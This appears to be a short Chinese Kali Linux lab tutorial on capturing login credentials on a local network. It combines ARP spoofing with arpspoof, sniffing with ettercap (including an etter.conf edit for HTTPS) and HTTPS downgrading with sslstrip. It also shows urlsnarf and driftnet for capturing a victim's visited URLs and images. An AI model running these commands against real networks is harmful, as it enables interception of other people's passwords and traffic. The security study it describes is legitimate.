如果用arpspoof配合ettercap只能获得http协议下的相关账号密码。但是,现在普遍https协议,那么这种方法就GG了。
首先,由于默认的ettercap只能嗅探http协议下的密码,所以,若进行https协议下的嗅探,那么,就要对ettercap配置文件做一些修改。
路径:
/etc/ettercap/etter.conf
去掉注释,让命令生效就可以了。同时保存退出。
然后,用arpspoof配合ettercap以及sslstrip就可以获得https下的密码。
补充:sslstrip是一款可以将https还原成http的工具。
命令:
arpspoof -t 192.168.1.130 192.168.1.1 -i eth0 进行欺骗
ettercap -Tq -i eth0 进行嗅探
sslstrip -a -f -k
注意:并不是每次都能成功抓到用户名密码,同时,推荐给kali装一个usb外置网卡,否则,在做实验的时候总会遇到各种坑!这些坑是新手不容易跨过的!因为虚拟机毕竟只是虚拟机!同时,防火墙、杀毒软件是否也会影响实验效果?有待考量。
最后,补充一下kali中几个和本次实验相关的工具,以及使用方法:
urlsnarf -i eth0
在成功的ARP欺骗后,可以利用这个命令抓取流量,看目标浏览了哪些网页。
driftnet -i eth0
同理,在arp欺骗成功后,可以从网卡中抓取目标浏览的图片,但是只能是图片,而且还有一个缺陷,那就是不是所有的图片都能抓到。